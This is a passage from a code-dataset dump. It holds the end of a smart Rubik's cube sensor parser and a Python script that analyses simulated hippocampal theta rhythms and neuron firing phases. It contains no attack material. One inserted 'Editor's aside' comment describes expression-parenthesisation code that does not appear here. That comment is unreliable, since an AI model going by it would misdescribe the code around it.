PinTracker(\"F'\", \"F\" ), # f'\n    PinTracker(\"D\",  \"D'\"),\n    PinTracker(\"L'\", \"L\" ),\n    PinTracker(\"U'\", \"U\" ), # u'\n    PinTracker(\"B'\", \"B\" ), # b'\n    PinTracker(\"R'\", \"R\" ), # r'\n]\n\nwhile True:\n    s = input()\n    if \"0x000e\" not in s:\n        continue\n    bytevals = s.split(\"0x000e value: \")[1].split()\n    vals = [int(bytevals[(2*i)+1] + bytevals[2*i], 
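# [Editor's aside] The is_left_from_parent/is_parent_associative plumbing above
# exists because "**" is right-associative: whether a child expression needs
# parentheses depends on which side of the parent operator it sits. A plain-Python
# illustration of the ambiguity the code generator has to preserve:
print(2 ** 3 ** 2)      # 512: parsed right-to-left as 2 ** (3 ** 2)
print((2 ** 3) ** 2)    # 64: the left child must be wrapped to change the meaning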
16) for i in range(6)]\n # print(vals)\n for i in range(6):\n turn = trackers[i].update(vals[i])\n if turn:\n print(turn)\n\n","repo_name":"thamma/SmartCube","sub_path":"parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74951471593","text":"# -*- coding: utf-8 -*-\n\"\"\"\nmain script for processing\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport processingLib as plib\nimport os\nimport scipy.signal as sig\nfrom scipy.stats import circmean, circstd\n\nplt.rc('axes', linewidth=2)\nplt.rc('xtick', labelsize=18)\nplt.rc('ytick', labelsize=18)\nplt.rc('lines', linewidth=3) \nplt.rc('lines', markersize=4)\nplt.rc('lines', c=\"black\")\n\ndef get_colors():\n neurons_colors = {\n \"pyr\" : (1.0, 0.2, 0.2), \n \"bas\" : (0.4, 1.0, 1.0),\n \"olm\" : (0.6, 1.0, 0.4),\n \"ca3\" : (1.0, 0.8, 0.0),\n \"ec\" : (1.0, 0.6, 0.6),\n \"ms\" : (0.2, 0.6, 1.0),\n }\n return neurons_colors\n\ndef make_calculation(path, file):\n Np = 400 # 400 # number of pyramide neurons\n Nb = 50 # number of basket cells\n Nolm = 50 # 50 # number of olm cells\n \n Nec = 100\n Nca3 = 100\n NSG = 100\n \n file = path + file\n \n fd = 10000\n margin = 0.5 # margin from start for analisis in seconds\n \n res = np.load(file)\n \n\n margin_ind = int(margin * fd)\n V = res[()][\"results\"][\"V\"]\n\n firing = res[()][\"results\"][\"firing\"]\n firing[0, :] -= 1000 * margin\n firing = firing[:, firing[0, :] >= 0]\n \n lfp = 0\n for v in V:\n try:\n lfp += v[\"dendrite\"] - v[\"soma\"]\n except KeyError:\n continue\n \n \n lfp = lfp[margin_ind : ] / Np\n lfp_filtred = plib.filtrate_lfp(lfp, 10000)\n lfp_filtred = lfp_filtred[0:-1:20]\n fd_filtered = 500\n \n lfp_filtred_fft = 2 * np.abs( np.fft.rfft(lfp) ) / lfp.size\n freqs = np.fft.rfftfreq(lfp.size, 1/fd)\n \n theta_part = np.sum(lfp_filtred_fft[ (freqs >= 4)&(freqs <= 12) ]) / np.sum(lfp_filtred_fft[1:]) \n \n theta_lfp = plib.butter_bandpass_filter(lfp_filtred, 4, 10, fd_filtered, 3)\n \n firing_slices = {}\n\n firing[0, :] *= 0.001\n # plot septal neurons\n cum_it = Np \n sl = (firing[1, :] < cum_it)\n \n \n firing_slices[\"pyramide\"] = np.copy(sl)\n\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nb)\n firing_slices[\"basket\"] = np.copy(sl)\n\n cum_it += Nb\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n \n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n \n cum_it += Nolm\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NSG)\n \n firing_slices[\"gaba_pv\"] = np.copy(sl)\n\n cum_it += NSG \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nec) \n firing_slices[\"ec\"] = np.copy(sl)\n cum_it += Nec\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nca3) \n\n firing_slices[\"cs\"] = np.copy(sl)\n \n neurons_phases = plib.get_units_disrtibution(theta_lfp, fd_filtered, firing, firing_slices)\n neurons_phases[\"theta_part\"] = theta_part\n \n return neurons_phases\n \n\ndef make_figures(path, file, septumInModel): # path, file, septumInModel=True\n\n Np = 400 # 400 # number of pyramide neurons\n Nb = 50 # number of basket cells\n Nolm = 50 # 50 # number of olm cells\n \n if (septumInModel):\n Nglu = 40\n NgabaCR = 40\n NgabaPV1 = 40 \n NgabaPV2 = 40\n NgabaPacPV1 = 10\n NgabaPacPV2 = 10\n else:\n NSG = 100 # number of spike generators of\n \n Nec = 100\n Nca3 
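# [Editor's aside] PinTracker above debounces a noisy analog reading into one of
# four quarter-range states and emits a face turn only after ten consecutive
# agreeing samples; large jumps are treated as bounce and pinned to max_val until
# the window settles. A synthetic driver, assuming the PinTracker class above is in
# scope (the reading values and the "R" labels are assumptions):
tracker = PinTracker("R'", "R")
readings = [100] * 12 + [400] * 24      # settle in state 0, then move to state 1
for v in readings:
    event = tracker.update(v)
    if event:
        print(event)                    # prints R' once, when state 1 stabilizes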
= 100\n\n neurons_colors = get_colors()\n\n \n saving_path = path + file[0:2]\n \n file = path + file\n \n fd = 10000\n margin = 0.5 # margin from start for analisis in seconds\n \n res = np.load(file)\n \n lfp = res[()][\"results\"][\"lfp\"]\n margin_ind = int(margin * fd)\n lfp = lfp[margin_ind : ]\n V = res[()][\"results\"][\"V\"]\n currents = res[()][\"results\"][\"currents\"]\n firing = res[()][\"results\"][\"firing\"]\n firing[0, :] -= 1000 * margin\n firing = firing[:, firing[0, :] >= 0]\n \n \n \n lfp_filtred = plib.filtrate_lfp(lfp, fd)\n lfp_filtred = lfp_filtred[0:-1:20]\n fd = 500\n t = np.linspace(0, lfp_filtred.size/fd, lfp_filtred.size)\n\n \n lfp2 = 0\n Vdm = -60\n Vsm = -60\n for v in V:\n try:\n Vdm += v[\"dendrite\"]\n Vsm += v[\"soma\"]\n lfp2 += v[\"dendrite\"] - v[\"soma\"]\n except KeyError:\n continue\n # lfp *= 1000 # recalculate from mV to mkV \n # lfp2 *= 1000 # recalculate from mV to mkV \n Vdm = Vdm[margin_ind : ] / Np\n Vsm = Vsm[margin_ind : ] / Np\n \n lfp2 = lfp2[margin_ind : ] / Np\n lfp_filtred2 = plib.filtrate_lfp(lfp2, 10000)\n lfp_filtred2 = lfp_filtred2[0:-1:20]\n \n pyr_firing_max_idx = 0\n tmp_count = 0\n for idx in range(Np):\n tmp = np.count_nonzero(firing[1, :] == idx)\n if (tmp > tmp_count):\n tmp_count = tmp\n pyr_firing_max_idx = idx - 1\n \n\n bas_firing_max_idx = Np + 1\n tmp_count = 0\n for idx in range(Np, Np + Nb):\n tmp = np.count_nonzero(firing[1, :] == idx)\n if (tmp > tmp_count):\n tmp_count = tmp\n bas_firing_max_idx = idx - 1\n \n olm_firing_max_idx = Np + Nb + 1\n tmp_count = 0\n for idx in range( Np + Nb, Np + Nb + Nolm):\n tmp = np.count_nonzero(firing[1, :] == idx)\n if (tmp > tmp_count):\n tmp_count = tmp\n olm_firing_max_idx = idx - 1\n \n \n Vpyr = V[pyr_firing_max_idx][\"soma\"][margin_ind : ] - 60\n # Vpyrd = V[pyr_firing_max_idx][\"dendrite\"][margin_ind : ] - 60\n Vbas = V[bas_firing_max_idx][\"soma\"][margin_ind : ]\n Volm = V[olm_firing_max_idx][\"soma\"][margin_ind : ]\n \n \n t4v = np.linspace(0, t[-1], Vpyr.size)\n \n \n \n plt.figure( figsize = (10, 5), tight_layout=True)\n plt.subplot(311)\n plt.plot(t4v, Vpyr, color=neurons_colors[\"pyr\"])\n plt.xlim(0, 1.5)\n plt.ylim(-95, 70)\n\n \n plt.subplot(312)\n plt.plot(t4v, Vbas, color=neurons_colors[\"bas\"])\n plt.xlim(0, 1.5)\n plt.ylim(-95, 70)\n\n \n plt.subplot(313)\n plt.plot(t4v, Volm, color=neurons_colors[\"olm\"])\n plt.xlim(0, 1.5)\n plt.ylim(-95, 70)\n \n \n plt.savefig(saving_path + \"Vhist.png\", dpi = 500)\n \n \n \n plt.figure( figsize = (10, 2), tight_layout=True )\n #plt.subplot(211)\n plt.plot(t, lfp_filtred2, color=\"black\")\n plt.xlim(0, 1.5)\n # plt.subplot(212)\n # plt.plot(t, lfp_filtred, \"g\")\n plt.savefig(saving_path + \"lfp2.png\", dpi = 500)\n \n lfp = lfp2 # !!!!!!!!!!\n lfp_filtred = lfp_filtred2 # !!!!!!!!!!!!!!!!\n \n # calculate and plot wavelet spectrum and LFP signal\n freqs, coefs = plib.computemycwt(fd, lfp_filtred)\n \n \n plt.figure( figsize = (10, 5), tight_layout=True )\n plt.subplot(211)\n Z = np.abs(coefs) * 1000\n plt.pcolor(t, freqs, Z, cmap='rainbow', vmin=Z.min(), vmax= Z.max())\n plt.title('Wavelet spectrum of simulated LFP')\n # set the limits of the plot to the limits of the data\n plt.axis([t[0], t[-1], freqs[0], 30])\n plt.colorbar()\n \n \n plt.subplot(212)\n plt.plot(t, 1000 * lfp_filtred, color=\"black\")\n plt.xlim(t[0], t[-1])\n # plt.ylim(1.2*lfp_filtred.max(), -1.2*lfp_filtred.min())\n plt.colorbar()\n plt.savefig(saving_path + \"wavelet.png\", dpi = 500)\n \n \n lfp_filtred_fft = 2 * np.abs( 
np.fft.rfft(lfp2) ) / lfp2.size\n freqs = np.fft.rfftfreq(lfp2.size, 1/10000)\n \n theta_part = np.sum(lfp_filtred_fft[ (freqs >= 4)&(freqs <= 12) ]) / np.sum(lfp_filtred_fft[1:]) \n \n \n plt.figure( tight_layout=True )\n plt.plot(freqs[1:], lfp_filtred_fft[1:])\n plt.xlim(0, 20)\n plt.ylim(0, 0.1)\n plt.savefig(saving_path + \"fft_lfp_filteterd.png\", dpi = 500)\n \n \n \n \n # calculate and plot asymmetry index\n asymmetry_index, idx_max, idx_min = plib.get_asymetry_index(lfp_filtred)\n if (asymmetry_index.size > 0):\n plt.figure()\n plt.subplot(121)\n plt.plot(t, lfp_filtred, color=\"black\", linewidth=2)\n lfp_max = lfp_filtred.max()\n lfp_min = lfp_filtred.min()\n for i in idx_max:\n plt.plot([t[i], t[i]], [lfp_min, lfp_max], color=\"blue\", linestyle=\"dashed\", linewidth=2)\n \n for i in idx_min:\n plt.plot([t[i], t[i]], [lfp_min, lfp_max], color=\"blue\", linestyle=\"dashed\", linewidth=2)\n \n plt.subplot(122) \n plt.hist(asymmetry_index, 10, normed=1, facecolor='blue', alpha=0.75)\n plt.xlim(-1.5, 1.5)\n plt.xlabel('Asymmetry index')\n plt.ylabel('Theta cycles')\n plt.title('')\n plt.savefig(saving_path + \"asymmetry_index.png\", dpi = 500)\n else:\n print (\"Zero elements in asymemetry index array\")\n \n # calculate and plot amplitude - phase cross frequency coupling between theta and gamma rhythms\n ampFrs = np.linspace(30, 80, 50)\n phFrs = np.array([4.0, 10.0])\n apcoupling = plib.cossfrequency_phase_amp_coupling(lfp_filtred, fd, ampFrs, phFrs, 0.1)\n theta_phase = np.linspace(-np.pi, np.pi, apcoupling.shape[1])\n plt.figure()\n plt.subplot(111)\n plt.pcolor(theta_phase, ampFrs, apcoupling, cmap='rainbow', vmin=apcoupling.min(), vmax=apcoupling.max())\n plt.title('Cross frequency coupling between theta and gamma rhythms')\n plt.axis([-np.pi, np.pi, ampFrs[0], ampFrs[-1]])\n plt.colorbar()\n plt.savefig(saving_path + \"amp_phase_coupling.png\", dpi = 500)\n \n # calculate and plot phase-phase cross frequency coupling between theta and gamma rhythms\n phFrs1 = np.array([4.0, 10.0])\n phFrs2 = np.array([30, 90])\n nmarray = np.ones([2, 12])\n nmarray[1, :] = np.arange(1, 13)\n ppcoupling = plib.cossfrequency_phase_phase_coupling (lfp_filtred, fd, phFrs1, phFrs2, nmarray)\n \n plt.figure()\n plt.plot(nmarray[1, :], ppcoupling)\n plt.xlim(1, nmarray[1, -1])\n plt.savefig(saving_path + \"phase_phase_coupling.png\", dpi = 500)\n# \n \n # calculate and plot phase coupling between units activity and theta rhythm \n \n \n theta_lfp = plib.butter_bandpass_filter(lfp_filtred, 4, 10, fd, 3)\n \n plt.figure( figsize = (10, 2), tight_layout=True )\n plt.plot(t, theta_lfp, color=\"black\")\n plt.xlim(t[0], t[-1])\n plt.savefig(saving_path + \"theta_lfp.png\", dpi = 500)\n \n \n \n \n \n \n plt.figure()\n plt.plot(t, lfp_filtred, color=\"black\")\n plt.xlim(0, 1.5) # plt.xlim(t[0], t[-1])\n \n \n # plt.subplot(312)\n # plt.plot(t, theta_lfp, color=\"blue\")\n # plt.xlim(0, 1.5) #plt.xlim(t[0], t[-1])\n firing_slices = {}\n # plt.figure( figsize = (10, 5), tight_layout=True )\n fig, (a1, a2, a3, a4, a5, a6) = plt.subplots(6, 1, sharex=True, gridspec_kw = {'height_ratios':[2, 2, 2, 1, 1, 8]}, figsize = (10, 5))\n fig.set_size_inches(10, 10)\n \n \n \n firing[0, :] *= 0.001\n # plot septal neurons\n if (septumInModel):\n pass\n# cum_it = Nglu\n# sl = firing[1, :] <= cum_it\n# firing_slices[\"glu\"] = np.copy(sl)\n# glu_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"r\")\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaCR)\n# firing_slices[\"gaba_cr\"] = 
np.copy(sl)\n# cr_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"g\")\n# cum_it += NgabaCR\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV1 + NgabaPacPV1)\n# firing_slices[\"gaba_pv1\"] = np.copy(sl)\n# pv1_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV1 + NgabaPacPV1\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV2 + NgabaPacPV2)\n# firing_slices[\"gaba_pv2\"] = np.copy(sl)\n# pv2_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV2 + NgabaPacPV2\n#\n# # plot hippocampal neurons\n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Np)\n else:\n cum_it = Np \n sl = (firing[1, :] < cum_it)\n \n \n firing_slices[\"pyramide\"] = np.copy(sl)\n pyr_line = a6.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"pyr\"])\n \n if (septumInModel):\n cum_it += Np\n \n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nb)\n firing_slices[\"basket\"] = np.copy(sl)\n basket_line = a5.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"bas\"])\n a5.set_ylim(400, 450)\n cum_it += Nb\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n olm_line = a4.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"olm\"])\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n firing_slices[\"olm\"] = np.copy(sl)\n \n if not(septumInModel):\n cum_it += Nolm\n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NSG)\n \n pv_line = a3.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"ms\"])\n firing_slices[\"gaba_pv\"] = np.copy(sl)\n \n# if (septumInModel): \n# plt.legend((glu_line, cr_line, pv1_line, pv2_line, pyr_line, basket_line, olm_line),\n# ('Glu', 'GABA(CR)', 'GABA(PV1)', 'GABA(PV2)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=12)\n# else:\n# plt.legend((pv_line, pyr_line, basket_line, olm_line),\n# ('GABA(PV)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=12)\n \n cum_it += NSG \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nec) \n a2.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"ec\"])\n firing_slices[\"ec\"] = np.copy(sl)\n cum_it += Nec\n \n sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nca3) \n a1.scatter(firing[0, sl], firing[1, sl], color=neurons_colors[\"ca3\"])\n firing_slices[\"cs\"] = np.copy(sl)\n \n plt.xlim(0, 1.5) #(0, t[-1])\n # plt.ylim(0, 800)\n \n fig.tight_layout()\n fig.savefig(saving_path + \"raster.png\", dpi = 500)\n \n \n \n \n neurons_phases_for_return = plib.get_units_disrtibution(theta_lfp, fd, firing, firing_slices)\n \n neurons_phases = {}\n for neuron_phase_key in neurons_phases_for_return.keys():\n neurons_phases[neuron_phase_key] = np.append(neurons_phases_for_return[neuron_phase_key], neurons_phases_for_return[neuron_phase_key] + 2*np.pi )\n \n phases_x = np.linspace(-np.pi, 3*np.pi, 40)\n phases_y = 0.5*np.cos(phases_x) + 0.5\n plt.figure( tight_layout=True )\n plt.subplot(311)\n\n plt.hist(neurons_phases[\"pyramide\"], 40, normed=True, facecolor=neurons_colors[\"pyr\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.subplot(312)\n plt.hist(neurons_phases[\"basket\"], 40, normed=True, facecolor=neurons_colors[\"bas\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.subplot(313)\n 
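# NOTE (added): the phase arrays above were duplicated at +2*np.pi only so each\n # histogram spans two theta cycles; as a hedged sketch (not the authors' code),\n # the same distributions could be summarized with the circular statistics\n # already imported at the top of this module:\n # olm_mean = circmean(neurons_phases_for_return[\"olm\"], high=np.pi, low=-np.pi)\n # olm_std = circstd(neurons_phases_for_return[\"olm\"], high=np.pi, low=-np.pi)\n 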
plt.hist(neurons_phases[\"olm\"], 40, normed=True, facecolor=neurons_colors[\"olm\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.tight_layout()\n plt.savefig(saving_path + \"phase_disribution_histogram.png\", dpi = 500)\n \n plt.figure()\n plt.subplot(111, polar=True)\n\n \n color = \"y\"\n for key, sl in firing_slices.items():\n fir = firing[:, sl]\n if (fir.size == 0):\n continue\n \n \n angles, length = plib.get_units_phase_coupling(theta_lfp, fir, fd)\n #angles += np.pi/2\n \n if (key == \"glu\"):\n color = \"r\"\n if (key == \"gaba_cr\"):\n color = \"g\"\n if (key == \"gaba_pv1\" or key == \"gaba_pv2\" or key == \"gaba_pv\"):\n color = neurons_colors[\"ms\"]\n if (key == \"pyramide\"):\n color = neurons_colors[\"pyr\"]\n if (key == \"basket\"):\n color = neurons_colors[\"bas\"] \n if (key == \"olm\"):\n color = neurons_colors[\"olm\"]\n if (key == \"cs\"):\n color = neurons_colors[\"ca3\"]\n if (key == \"ec\"):\n color = neurons_colors[\"ec\"]\n \n plt.scatter(angles, length, color=color)\n \n # calculate histogram ?\n \n\n plt.savefig(saving_path + \"phase_disribution_of_neurons.png\", dpi = 500)\n plt.figure( tight_layout=True )\n plt.subplot(111)\n #theta_lfp = plib.butter_bandpass_filter(lfp_filtred, 4, 12, fd, 2)\n \n color = \"g\"\n for key, sl in firing_slices.items():\n \n fir = firing[:, sl]\n if (fir.size == 0):\n continue\n angles, length = plib.get_units_phase_coupling(theta_lfp, fir, fd)\n #angles += np.pi/2\n minn = np.min( firing[1, sl] ) \n maxn = np.max( firing[1, sl] ) \n numbers = np.linspace(minn, maxn, angles.size)\n \n if (key == \"glu\"):\n color = \"r\"\n if (key == \"gaba_cr\"):\n color = \"g\"\n if (key == \"gaba_pv1\" or key == \"gaba_pv2\" or key == \"gaba_pv\"):\n color = neurons_colors[\"ms\"]\n if (key == \"pyramide\"):\n color = neurons_colors[\"pyr\"]\n if (key == \"basket\"):\n color = neurons_colors[\"bas\"] \n if (key == \"olm\"):\n color = neurons_colors[\"olm\"]\n if (key == \"cs\"):\n color = neurons_colors[\"ca3\"]\n if (key == \"ec\"):\n color = neurons_colors[\"ec\"]\n plt.scatter(angles, numbers, color=color)\n\n # calculate histogram ?\n plt.ylim(0, 800)\n tmp_phases = np.linspace(-np.pi, np.pi, 1000)\n plt.plot( tmp_phases, 200 * ( np.cos(tmp_phases) + 1 ), color=\"black\" )\n plt.xlim(-np.pi, np.pi)\n \n plt.savefig(saving_path + \"phase_disribution_of_neurons2.png\", dpi = 500)\n \n \n\n \n \n soma_currents = np.zeros(currents[0][\"soma\"].size)\n dendrite_current = np.zeros_like(soma_currents)\n Vin = np.zeros(V[0][\"soma\"].size)\n for cur, vin in zip(currents, V):\n if \"dendrite\" in cur.keys():\n soma_currents += cur[\"soma\"]\n dendrite_current += cur[\"dendrite\"]\n Vin += vin[\"soma\"]\n \n soma_currents = sig.resample(soma_currents[margin_ind: ], lfp_filtred.size) \n dendrite_current = sig.resample(dendrite_current[margin_ind : ], lfp_filtred.size) \n Vin /= Np\n Vin = sig.resample(Vin[margin_ind: ], lfp_filtred.size) \n \n \n soma_currents = (soma_currents - soma_currents.mean() ) / soma_currents.std()\n dendrite_current = (dendrite_current - dendrite_current.mean() ) / dendrite_current.std()\n lfp_filtred_normed = (lfp_filtred - lfp_filtred.mean()) / lfp_filtred.std()\n plt.figure( tight_layout=True, figsize=(8, 5) )\n plt.subplot(311)\n plt.plot(t, Vin)\n plt.title(\"Intracellular potential on soma\")\n plt.xlim(0, 1.5) #plt.xlim(1, 1.5)\n plt.subplot(312)\n plt.plot(t, soma_currents, \"b\")\n plt.plot(t, lfp_filtred_normed, \"g\")\n #plt.ylim(-1, 1)\n plt.xlim(0, 1.5) # 
plt.xlim(1, 1.5) #\n plt.title(\"soma\")\n plt.subplot(313)\n plt.plot(t, dendrite_current, \"b\")\n plt.plot(t, lfp_filtred_normed, \"g\")\n plt.xlim(0, 1.5) # plt.xlim(1, 1.5) #\n # plt.ylim(-1, 1)\n plt.title(\"dendrite\")\n# plt.subplot(414) \n# # plot septal neurons\n# if (septumInModel):\n# cum_it = Nglu\n# sl = firing[1, :] <= cum_it\n# firing_slices[\"glu\"] = np.copy(sl)\n# glu_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"r\")\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaCR)\n# firing_slices[\"gaba_cr\"] = np.copy(sl)\n# cr_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"g\")\n# cum_it += NgabaCR\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV1 + NgabaPacPV1)\n# firing_slices[\"gaba_pv1\"] = np.copy(sl)\n# pv1_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV1 + NgabaPacPV1\n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + NgabaPV2 + NgabaPacPV2)\n# firing_slices[\"gaba_pv2\"] = np.copy(sl)\n# pv2_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# cum_it += NgabaPV2 + NgabaPacPV2\n#\n# # plot hippocampal neurons\n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Np)\n# else:\n# cum_it = Np \n# sl = (firing[1, :] < cum_it)\n# firing_slices[\"pyramide\"] = np.copy(sl)\n# pyr_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"c\")\n# \n# if (septumInModel):\n# cum_it += Np\n# \n# \n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nb)\n# firing_slices[\"basket\"] = np.copy(sl)\n# basket_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"k\")\n# cum_it += Nb\n# sl = (firing[1, :] > cum_it) & (firing[1, :] <= cum_it + Nolm)\n# firing_slices[\"olm\"] = np.copy(sl)\n# olm_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"m\")\n# plt.ylim(0, 800)\n# #plt.xlim(1, 1.5) #plt.xlim(0, 1.5)\n# if not(septumInModel):\n# cum_it += Nolm\n# sl = (firing[1, :] > cum_it)\n# \n# pv_line = plt.scatter(firing[0, sl], firing[1, sl], color=\"b\")\n# firing_slices[\"gaba_pv1\"] = np.copy(sl)\n# \n# if (septumInModel): \n# plt.legend((glu_line, cr_line, pv1_line, pv2_line, pyr_line, basket_line, olm_line),\n# ('Glu', 'GABA(CR)', 'GABA(PV1)', 'GABA(PV2)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=8)\n# else:\n# plt.legend((pv_line, pyr_line, basket_line, olm_line),\n# ('GABA(PV)', 'Pyramide', 'Basket', 'OLM'),\n# scatterpoints=1,\n# loc='upper left',\n# ncol=1,\n# fontsize=8)\n \n\n plt.savefig(saving_path + \"currents.png\", dpi = 500)\n plt.close('all')\n \n neurons_phases_for_return[\"theta_part\"] = theta_part\n return neurons_phases_for_return\n \n################################################################\ndef ms_cs_pp_phase_shift_processing(processed_data, saving_path):\n \n \n \n \n phase_shift = np.linspace(-np.pi, np.pi, 30)\n \n neurons_colors = get_colors()\n \n data_mean_pyr = []\n data_varience_pyr = []\n \n data_mean_bas = []\n data_varience_bas = []\n\n data_mean_olm = []\n data_varience_olm = []\n \n \n new_processed_data = []\n \n for idx1 in range(30):\n \n \n pyr_data = np.array([], dtype=float)\n bas_data = np.array([], dtype=float)\n olm_data = np.array([], dtype=float)\n theta_part = np.array([], dtype=float)\n \n \n for t in processed_data[idx1:-1:30]:\n # print (t)\n pyr_data = np.append(pyr_data, t[\"pyramide\"])\n bas_data = np.append(bas_data, t[\"basket\"])\n olm_data = np.append(olm_data, t[\"olm\"])\n theta_part = np.append(theta_part, t[\"theta_part\"])\n 
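# NOTE (added): the slice processed_data[idx1:-1:30] assumes the runs are stored\n # in repeat-major blocks of the 30 phase-shift values, so run k is pooled into\n # group k % 30 (e.g. with 150 runs, idx1 == 0 pools runs 0, 30, 60, 90, 120);\n # the -1 stop also leaves the very last record out of its pool.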
\n tmp_dict = {\"pyramide\":pyr_data, \"basket\":bas_data, \"olm\":olm_data, \"theta_part\":theta_part}\n \n new_processed_data.append(tmp_dict)\n\n theta_part = []\n for data_value in new_processed_data:\n data_mean_pyr.append( circmean(data_value[\"pyramide\"], high=np.pi, low=-np.pi) )\n data_varience_pyr.append( circstd(data_value[\"pyramide\"], high=np.pi, low=-np.pi) )\n \n data_mean_bas.append( circmean(data_value[\"basket\"], high=np.pi, low=-np.pi) )\n data_varience_bas.append( circstd(data_value[\"basket\"], high=np.pi, low=-np.pi) )\n \n data_mean_olm.append( circmean(data_value[\"olm\"], high=np.pi, low=-np.pi) )\n data_varience_olm.append( circstd(data_value[\"olm\"], high=np.pi, low=-np.pi) )\n \n theta_part.append(data_value[\"theta_part\"])\n \n phases = np.linspace(-2*np.pi, 2*np.pi, 100)\n wave = np.cos(phases)\n fig, axs = plt.subplots(nrows=1, ncols=3, sharex=True)\n axs[0].plot(phases, wave, color=\"black\", linewidth=2)\n axs[0].errorbar(data_mean_pyr, phase_shift, xerr=data_varience_pyr, fmt='o', color=neurons_colors[\"pyr\"] )\n \n axs[0].set_xlim(-2*np.pi, 2*np.pi)\n axs[0].set_title('Pyr')\n axs[1].plot(phases, wave, color=\"black\", linewidth=2)\n axs[1].errorbar(data_mean_bas, phase_shift, xerr=data_varience_bas, fmt='o', color=neurons_colors[\"bas\"])\n \n axs[1].set_xlim(-2*np.pi, 2*np.pi)\n axs[1].set_title('Bas')\n \n axs[2].plot(phases, wave, color=\"black\", linewidth=2)\n axs[2].errorbar(data_mean_olm, phase_shift, xerr=data_varience_olm, fmt='o', color=neurons_colors[\"olm\"])\n axs[2].set_xlim(-2*np.pi, 2*np.pi)\n axs[2].set_title('OLM')\n \n fig.tight_layout()\n fig.savefig(saving_path + \"ms_cs_pp_phase_shift.png\", dpi=500)\n\n \n theta_part_mean = np.zeros(30, dtype=float)\n theta_part_std = np.zeros(30, dtype=float)\n for idx, t in enumerate(theta_part):\n theta_part_mean[idx] = np.mean(t)\n theta_part_std[idx] = np.std(t)\n fig, axs = plt.subplots()\n fig.set_size_inches(10, 5)\n axs.errorbar(phase_shift, theta_part_mean, yerr=theta_part_std, fmt='o')\n \n \n fig.savefig(saving_path + \"ms_cs_pp_phase_shift_theta_power.png\", dpi=500)\n \n \ndef without_of_each_input_processing(processed_data, control_data, saving_path):\n \n neurons_colors = get_colors()\n \n without_pv1_pyr = np.array([], dtype=float)\n without_pv1_bas = np.array([], dtype=float)\n without_pv1_olm = np.array([], dtype=float)\n \n without_pv2_pyr = np.array([], dtype=float)\n without_pv2_bas = np.array([], dtype=float)\n without_pv2_olm = np.array([], dtype=float)\n \n without_pp_pyr = np.array([], dtype=float)\n without_pp_bas = np.array([], dtype=float)\n without_pp_olm = np.array([], dtype=float)\n \n without_cs_pyr = np.array([], dtype=float)\n without_cs_bas = np.array([], dtype=float)\n without_cs_olm = np.array([], dtype=float)\n \n without_ms_pyr = np.array([], dtype=float)\n without_ms_bas = np.array([], dtype=float)\n without_ms_olm = np.array([], dtype=float)\n \n without_ex_pyr = np.array([], dtype=float)\n without_ex_bas = np.array([], dtype=float)\n without_ex_olm = np.array([], dtype=float)\n \n theta_part = np.array([], dtype=float)\n \n for data_value in control_data:\n theta_part = np.append( theta_part, data_value[\"theta_part\"] )\n \n for idx, data_value in enumerate(processed_data):\n theta_part = np.append( theta_part, 